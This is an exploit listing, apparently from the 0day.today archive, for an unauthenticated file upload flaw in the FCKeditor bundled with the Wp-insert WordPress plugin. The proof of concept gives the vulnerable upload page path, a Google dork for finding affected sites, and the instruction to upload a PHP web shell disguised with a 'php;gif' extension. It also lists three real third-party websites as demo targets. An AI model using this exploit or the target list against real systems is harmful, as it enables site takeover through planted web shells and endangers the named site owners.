Wordpress Plugin Wp-insert [FCKeditor] Upload Shell

2012-04-07T00:00:00
ID 1337DAY-ID-17994
Type zdt
Reporter Hacker-Fire
Modified 2012-04-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##################################################
# Exploit Title: [Wp-insert Wordpress Plugin [FCKeditor] Upload]
# Date: [06-04-2012]
# Author: [Hacker-Fire]
# Category:: [ webapps]
# Software Link: [http://wordpress.org/extend/plugins/wp-insert/]
# Google dork: [ /wp-insert/fckeditor/]
# Tested on: [Windows 7 & BT5r2 ]
# Demo site: [http://www.hiphopcongress.com/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html]
[http://fop95.com/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html]
[http://elles.centrepompidou.fr/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html]
##################################################

[~] P0c [~] :

Vuln Upload file in :

localhost/PATH/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html

Upload Your Shell : php;gif  & Enjoy .

##########################################################
[»] Greetz to :
                     
[ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ] 
[ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ]             
[ And all my Freinds + Algerian Hackers ]
       
##########################################################



#  0day.today [2018-03-14]  #